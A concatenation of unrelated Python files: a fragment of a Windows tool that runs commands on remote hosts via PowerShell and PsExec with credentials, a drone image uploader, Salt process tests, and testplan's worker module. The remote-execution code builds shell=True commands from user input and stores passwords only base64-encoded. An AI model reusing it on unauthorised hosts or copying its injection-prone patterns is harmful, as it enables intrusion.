"'"+" "+opts+r"' -Credential $Cred;$Process = Get-Process -ID $proc.processid;$Process.WaitForExit();Get-Content \\"+dest+r"\C$\temp\result.txt -Credential $Cred;"+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="PSEXEC":
if "Opts.(Default)" in opts or len(opts)<1:
opts="-s"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output(r"chcp 65001>NUL && .\PSEXEC /accepteula \\"+dest+" "+opts+" cmd /c "+'"'+querry+'"'+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output(r"chcp 65001>NUL && .\PSEXEC /accepteula \\"+dest+" -u "+user+" -p "+passw.decode('base64')+" "+opts+" cmd /c "+'"'+querry+'"'+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
destroy_window()
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+'\n'+out)
except subprocess.CalledProcessError as e:
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+e.output)
except Exception as e:
if hasattr(e, 'message'):
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+getattr(e, 'message', repr(e)))
else:
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+"Unknown error !!!")
if iterations>=len(hosts_parsed):
w.Button1.configure(text='''GO''')
w.Scrolledtext3.see("end")
w.TProgressbar1['value']=0
run_block=False
else:
run_block=True
def check_system():
global run_block,block,thread_limit
while run_block:
current_cpu=psutil.cpu_percent(interval=0.2, percpu=False)
if psutil.virtual_memory().percent<MEMORY_LIMIT_PERCENT and current_cpu<CPU_LIMIT_PERCENT:
block=False
thread_limit+=2
else:
block=True
thread_limit-=2
def init(top, gui, *args, **kwargs):
global w, top_level, root
w = gui
top_level = top
root = top
def destroy_window():
# Function which closes the window.
global top_level,run_block,hosts_parsed
hosts_parsed = []
run_block=False
top_level.destroy()
top_level = None
if __name__ == '__main__':
import gui1
gui1.vp_start_gui()
|
imageService.py
|
import asyncio
import time
import base64
import requests
from threading import Thread, Lock
from time import sleep
from apps.Config.config import config
class ImageService:
groundstation_url = (
config.values["groundstation"]["ip"]
+ ":"
+ config.values["groundstation"]["port"]
)
def __init__(self):
self.img_path = "~/obc/images/"
self.status = "down"
self.image_queue = []
self.mutex = Lock()
self.poll_time = int(config.values["image_service"]["interval"])
# The start and stop functions do not need to be used if the programmer
# thinks that this class should not take the form of a process
def start(self):
# this function is responsible for initializing connections
# and processes that may be used by the ImageService class
# self.status = 'maybe running'
print("starting imageService")
image_queue_thread = Thread(
target=self.poll_image_queue, args=(self.poll_time,)
)
image_queue_thread.start()
# poll_time is the amount of time in seconds that the thread sleeps in between
# checking the queue if there is an image ready to be sent to groundstation
def poll_image_queue(self, poll_time):
while True:
self.mutex.acquire()
img_to_send = self.peekImageQueue()
if img_to_send is not None:
img_to_send["image"] = self.get_encoded_img(img_to_send["image"])
if img_to_send["image"] is not None:
if self.send_img(img_to_send):
self.popImageQueue()
else:
self.popImageQueue()
self.mutex.release()
sleep(poll_time)
# test function to put images in the queue
def add_new_image_to_queue(self, add_time):
x = 0
while True:
self.appendImageQueue({"image": "photo" + str(x % 3 + 1) + ".jpg", "telemetry": {}})  # queue items are dicts, as poll_image_queue/send_img expect (empty telemetry as a placeholder)
x += 1
sleep(add_time)
def stop(self):
self.status = "down"
print("stopping imageService")
pass
def save_img(self, img):
# this function will receive an image and store it locally
# with telemetry data(hopefully inside photo metadata).
pass
def get_telemetry(self):
# this function probes telem2 port on pixhawk for gps data
pass
# returns Encoded image given filename
# returns None if image couldn't be opened
def get_encoded_img(self, img):
try:
with open(img, "rb") as image_file:
return base64.b64encode(image_file.read())
except Exception as e:
# print(str(e))
print("Failed to get encoded image. Removing from queue.")
return None
# accepts image dictionary object
# returns True if image successfully sent to groundstation
def send_img(self, img):
timestamp = time.time() * 1000
try:
payload = {
"timestamp": timestamp,
"image": img["image"].decode("utf-8", "ignore"),
"telemetry": img["telemetry"],
}
requests.post(self.groundstation_url + "/images", json=payload)
print("successfully sent image to the groundstation.")
return True
except Exception as e:
print(str(e))
print("Failed to send image to groundstation")
return False
# File pointer
# this function must send images to
# the ground station in the form of a post request
# refer to apps/SonyCamera/stillProcessor.py for example
# 1. encode img in base 64
# 2. add gps data and encoded image to dict
# 3. requests.post(groundstation_url + '/images', json=payload)
# pass
# acquires the queue mutex internally
# add an image to the image queue
def appendImageQueue(self, img):
self.mutex.acquire()
self.image_queue.append(img)
self.mutex.release()
# must be called with the queue mutex already held (see poll_image_queue)
# remove and return the image at the front of the queue
def popImageQueue(self):
return self.image_queue.pop(0)
# must be called with the queue mutex already held (see poll_image_queue)
# returns the head of the queue, or None if the queue is empty
def peekImageQueue(self):
head = None
if self.image_queue:
head = self.image_queue[0]
return head
imageService = ImageService()
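# A minimal usage sketch (added for illustration, not part of the original
# module): it assumes queue items are dicts with "image" (a file path) and
# "telemetry" keys, which is the shape poll_image_queue() and send_img()
# expect, and that the groundstation configured in config is reachable.
# The file name and telemetry values below are hypothetical.
if __name__ == "__main__":
    imageService.start()
    imageService.appendImageQueue(
        {"image": "photo1.jpg", "telemetry": {"lat": 0.0, "lon": 0.0}}
    )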
|
pool_2.py
|
from multiprocessing import Process
def f(name):
print('hello', name)
if __name__ == '__main__':
p = Process(target=f, args=('bob',))
p.start()
p.join()
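# A pool-based variant, added as a sketch for comparison (not in the original
# script); the worker count and the extra name are arbitrary choices.
from multiprocessing import Pool

if __name__ == '__main__':
    with Pool(processes=2) as pool:
        pool.map(f, ['bob', 'alice'])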
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import io
import os
import sys
import threading
import time
import signal
import multiprocessing
import functools
import datetime
import warnings
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import salt libs
import salt.utils.platform
import salt.utils.process
from salt.utils.versions import warn_until_date
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
import psutil
def die(func):
'''
Add proc title
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle('test_{0}'.format(name))
attrname = 'die_' + name
setattr(self, attrname, _die)
self.addCleanup(delattr, self, attrname)
return wrapper
def incr(func):
'''
Increment counter
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle('test_{0}'.format(name))
for _ in range(0, num):
counter.value += 1
attrname = 'incr_' + name
setattr(self, attrname, _incr)
self.addCleanup(delattr, self, attrname)
return wrapper
def spin(func):
'''
Spin indefinitely
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle('test_{0}'.format(name))
while True:
time.sleep(1)
attrname = 'spin_' + name
setattr(self, attrname, _spin)
self.addCleanup(delattr, self, attrname)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@skipIf(sys.version_info < (2, 7), 'Needs > Py 2.7 due to bug in stdlib')
@incr
def test_counter(self):
counter = multiprocessing.Value('i', 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
'''
Make sure the threadpool can do things
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
'''
Make sure that a full threadpool acts as we expect
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
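# The usage pattern the two tests above exercise, sketched outside the test
# harness (illustrative only; the positional arguments mirror the
# ThreadPool(0, 1) call above, i.e. worker count followed by queue size):
#
#     pool = salt.utils.process.ThreadPool(5, 10)
#     if pool.fire_async(some_callable, args=(value,)):
#         pass  # queued; a worker thread will run it
#     else:
#         pass  # queue full, the job was rejected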
class TestProcess(TestCase):
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch('sys.argv', ['salt-call']):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({'multiprocessing': False})
self.assertEqual(None, ret)
with patch('sys.platform', 'win'):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch('salt.utils.process.daemonize'), \
patch('sys.platform', 'linux2'):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks(self):
'Validate Process call after fork and finalize methods'
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
evt = multiprocessing.Event()
proc = salt.utils.process.Process(target=self.process_target, args=(evt,))
proc.run()
assert evt.is_set()
mb.assert_called()
ma.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks_called_when_run_overriden(self):
'Validate Process sub classes call after fork and finalize methods when run is overridden'
class MyProcess(salt.utils.process.Process):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
proc = MyProcess()
proc.run()
assert proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_does_not_exist(self):
try:
with patch('psutil.Process', self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_children_do_not_exist(self):
try:
with patch('psutil.Process.children', self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
'Used by run_forever_target to create a sub-process'
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
'A target that will run forever or until an event is set'
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith('win'), 'No os.fork on Windows')
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith('win'), 'Required signals not supported on windows')
def test_signal_processing_handle_signals_called(self):
'Validate SignalHandlingProcess handles signals'
# Global event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value('i', 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt),
)
proc2.start()
# Wait for the sub process to set its pid
while not val.value:
time.sleep(.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(.3)
try:
# Allow some time for the signal handler to do its thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestSignalHandlingProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks(self):
'Validate SignalHandlingProcess call after fork and finalize methods'
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
evt = multiprocessing.Event()
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.process_target,
args=(evt,)
)
sh_proc.run()
assert evt.is_set()
ma.assert_called()
mb.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks_called_when_run_overriden(self):
'Validate SignalHandlingProcess sub classes call after fork and finalize methods when run is overridden'
class MyProcess(salt.utils.process.SignalHandlingProcess):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = MyProcess()
sh_proc.run()
assert sh_proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
'The dup2 method does not fail on streams without fileno support'
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch('os.dup2') as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, 'io.UnsupportedOperation was raised'
assert not dup_mock.called
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finish before timeout")
time.sleep(.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
@staticmethod
def process_target():
pass
@staticmethod
def patched_warn_until_date(current_date):
def _patched_warn_until_date(date,
message,
category=DeprecationWarning,
stacklevel=None,
_current_date=current_date,
_dont_call_warnings=False):
# Because we add another function in between, the stacklevel
# set in salt.utils.process, 3, needs to now be 4
stacklevel = 4
return warn_until_date(date,
message,
category=category,
stacklevel=stacklevel,
_current_date=_current_date,
_dont_call_warnings=_dont_call_warnings)
return _patched_warn_until_date
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
'and instead use \'salt.utils.process.Process\'. '
'\'salt.utils.process.MultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.MultiprocessingProcess' "
r"and instead use 'salt.utils.process.Process'. "
r"'salt.utils.process.MultiprocessingProcess' will go away "
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r"filename '(.*)test_process.py', line number ([\d]+), is "
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
r"and instead use 'salt.utils.process.SignalHandlingProcess'. "
r"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r"filename '(.*)test_process.py', line number ([\d]+), is "
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
|
child.py
|
"""Child worker process module."""
import os
import sys
import time
import pickle
import signal
import socket
import shutil
import inspect
import logging
import argparse
import platform
import threading
import subprocess
def parse_cmdline():
"""Child worker command line parsing"""
parser = argparse.ArgumentParser(description='Remote runner parser')
parser.add_argument('--address', action="store")
parser.add_argument('--index', action="store")
parser.add_argument('--testplan', action="store")
parser.add_argument('--testplan-deps', action="store", default=None)
parser.add_argument('--wd', action="store")
parser.add_argument('--runpath', action="store", default=None)
parser.add_argument('--type', action="store")
parser.add_argument('--log-level', action="store", default=0, type=int)
parser.add_argument('--remote-pool-type', action="store", default='thread')
parser.add_argument('--remote-pool-size', action="store", default=1)
return parser.parse_args()
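# Example invocation (illustrative only; the address, index, working directory
# and log level below are hypothetical values, not taken from this repository):
#
#     python child.py --address 127.0.0.1:50000 --index 0 \
#         --wd /tmp/workdir --type process_worker --log-level 10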
class ZMQTransport(object):
"""
Transport layer for communication between a pool and child process worker.
The worker sends serializable messages; the pool receives them and sends back responses.
:param address: Pool address to connect to.
:type address: ``str``
:param recv_sleep: Sleep duration in msg receive loop.
:type recv_sleep: ``float``
"""
def __init__(self, address, recv_sleep=0.05, recv_timeout=5):
import zmq
self._zmq = zmq
self._recv_sleep = recv_sleep
self._recv_timeout = recv_timeout
self._context = zmq.Context()
self._sock = self._context.socket(zmq.REQ)
self._sock.connect("tcp://{}".format(address))
self.active = True
self.logger = logging.getLogger(self.__class__.__name__)
def send(self, message):
"""
Worker sends a message.
:param message: Message to be sent.
:type message: :py:class:`~testplan.runners.pools.communication.Message`
"""
self._sock.send(pickle.dumps(message))
def receive(self):
"""
Worker receives the response to the message sent.
:return: Response to the message sent.
:type: :py:class:`~testplan.runners.pools.communication.Message`
"""
start_time = time.time()
while self.active:
try:
received = self._sock.recv(flags=self._zmq.NOBLOCK)
try:
loaded = pickle.loads(received)
except Exception as exc:
print('Deserialization error. - {}'.format(exc))
raise
else:
return loaded
except self._zmq.Again:
if time.time() - start_time > self._recv_timeout:
print('Transport receive timeout {}s reached!'.format(
self._recv_timeout))
return None
time.sleep(self._recv_sleep)
return None
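# For orientation: the pool side of this transport (implemented elsewhere in
# testplan) conceptually pairs this REQ socket with a REP/ROUTER socket bound
# to the same address, exchanging pickled Message objects. A stripped-down
# echo counterpart might look like the sketch below (illustrative only, with a
# hypothetical address; it is not the real pool transport):
#
#     context = zmq.Context()
#     sock = context.socket(zmq.REP)
#     sock.bind("tcp://127.0.0.1:50000")
#     request = pickle.loads(sock.recv())
#     sock.send(pickle.dumps(request))  # echo the message back unchanged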
class ChildLoop(object):
"""
Child process loop that can be started in a process and starts a local
thread pool to execute the tasks received.
"""
def __init__(self, index, transport, pool_type, pool_size,
worker_type, logger, runpath=None):
self._metadata = {'index': index, 'pid': os.getpid()}
self._transport = transport
self._pool_type = pool_type
self._pool_size = int(pool_size)
self._pool_cfg = None
self._worker_type = worker_type
self._to_heartbeat = float(0)
self.runpath = runpath
self.logger = logger
@property
def metadata(self):
"""Metadata information."""
return self._metadata
def heartbeat_thread(self):
"""Manage a variable that indicates the sending of next heartbeat."""
while self._pool.status.tag == self._pool.STATUS.STARTED:
if self._to_heartbeat > 0:
sleep_interval = max(float(self._to_heartbeat)/2, 0.1)
self._to_heartbeat -= sleep_interval
time.sleep(sleep_interval)
else:
time.sleep(0.1)
def heartbeat_setup(self):
"""Start the heartbeat manager thread."""
heartbeat = threading.Thread(target=self.heartbeat_thread,)
heartbeat.daemon = True
heartbeat.start()
def _child_pool(self):
# Local thread pool will not cleanup the previous layer runpath.
self._pool = self._pool_type(
name='Pool_{}'.format(self._metadata['pid']),
worker_type=self._worker_type,
size=self._pool_size,
runpath=self.runpath)
self._pool.parent = self
self._pool.cfg.parent = self._pool_cfg
return self._pool
def _handle_abort(self, signum, frame):
self.logger.debug('Signal handler called for signal {} from {}'.format(
signum, threading.current_thread()))
if self._pool:
self._pool.abort()
os.kill(os.getpid(), 9)
self.logger.debug('Pool {} aborted.'.format(self._pool))
def _setup_logfiles(self):
if not os.path.exists(self.runpath):
os.makedirs(self.runpath)
stderr_file = os.path.join(self.runpath, '{}_stderr'.format(self._metadata['index']))
log_file = os.path.join(self.runpath, '{}_stdout'.format(self._metadata['index']))
self.logger.info('stdout file = %(file)s (log level = %(lvl)s)',
{'file': log_file, 'lvl': self.logger.level})
self.logger.info('stderr file = %s', stderr_file)
self.logger.info(
'Closing stdin, stdout and stderr file descriptors...')
# This closes stdin, stdout and stderr for this process.
for fdesc in range(3):
os.close(fdesc)
mode = 'w' if platform.python_version().startswith('3') else 'wb'
sys.stderr = open(stderr_file, mode)
fhandler = logging.FileHandler(log_file)
fhandler.setLevel(self.logger.level)
self.logger.addHandler(fhandler)
def _send_and_expect(self, message, send, expect):
try:
return self._transport.send_and_receive(message.make(
send), expect=expect)
except AttributeError:
self.logger.critical('Pool seems dead, child exits.')
raise
def _pre_loop_setup(self, message):
response = self._send_and_expect(
message, message.ConfigRequest, message.ConfigSending)
# Response.data: [cfg, cfg.parent, cfg.parent.parent, ...]
pool_cfg = response.data[0]
for idx, cfg in enumerate(response.data):
try:
cfg.parent = response.data[idx + 1]
print(cfg.parent)
except IndexError:
break
self._pool_cfg = pool_cfg
for sig in self._pool_cfg.abort_signals:
signal.signal(sig, self._handle_abort)
pool_metadata = response.sender_metadata
self.runpath = self.runpath or str(pool_metadata['runpath'])
self._setup_logfiles()
def worker_loop(self):
"""
Child process worker loop. Manages an underlying thread pool, pulls tasks
from the main pool and sends back results.
"""
from testplan.runners.pools.communication import Message
from testplan.common.utils.exceptions import format_trace
message = Message(**self.metadata)
try:
self._pre_loop_setup(message)
except Exception as exc:
self._transport.send_and_receive(message.make(
message.SetupFailed,
data=format_trace(inspect.trace(), exc)), expect=message.Ack)
return
with self._child_pool():
if self._pool_cfg.worker_heartbeat:
self.heartbeat_setup()
message = Message(**self.metadata)
next_possible_request = time.time()
request_delay = self._pool_cfg.active_loop_sleep
while True:
if self._pool_cfg.worker_heartbeat and self._to_heartbeat <= 0:
hb_resp = self._transport.send_and_receive(message.make(
message.Heartbeat, data=time.time()))
if hb_resp is None:
self.logger.critical('Pool seems dead, child exits.')
self.exit_loop()
break
else:
self.logger.debug(
'Pool heartbeat response:'
' {} at {} before {}s.'.format(
hb_resp.cmd, hb_resp.data,
time.time() - hb_resp.data))
self._to_heartbeat = self._pool_cfg.worker_heartbeat
# Send back results
if self._pool.results:
task_results = []
for uid in list(self._pool.results.keys()):
task_results.append(self._pool.results[uid])
self.logger.debug('Sending back result for {}'.format(
self._pool.results[uid].task))
del self._pool.results[uid]
self._transport.send_and_receive(message.make(
message.TaskResults,
data=task_results), expect=message.Ack)
# Request new tasks
demand = self._pool.workers_requests() -\
len(self._pool.unassigned)
if demand > 0 and time.time() > next_possible_request:
received = self._transport.send_and_receive(message.make(
message.TaskPullRequest, data=demand))
if received is None or received.cmd == Message.Stop:
self.logger.critical('Child exits.')
self.exit_loop()
break
elif received.cmd == Message.TaskSending:
next_possible_request = time.time()
request_delay = 0
for task in received.data:
self.logger.debug('Added {} to local pool'.format(
task))
self._pool.add(task, task.uid())
# Reset workers request counters
for worker in self._pool._workers:
worker.requesting = 0
elif received.cmd == Message.Ack:
request_delay = min(
(request_delay + 0.2) * 1.5,
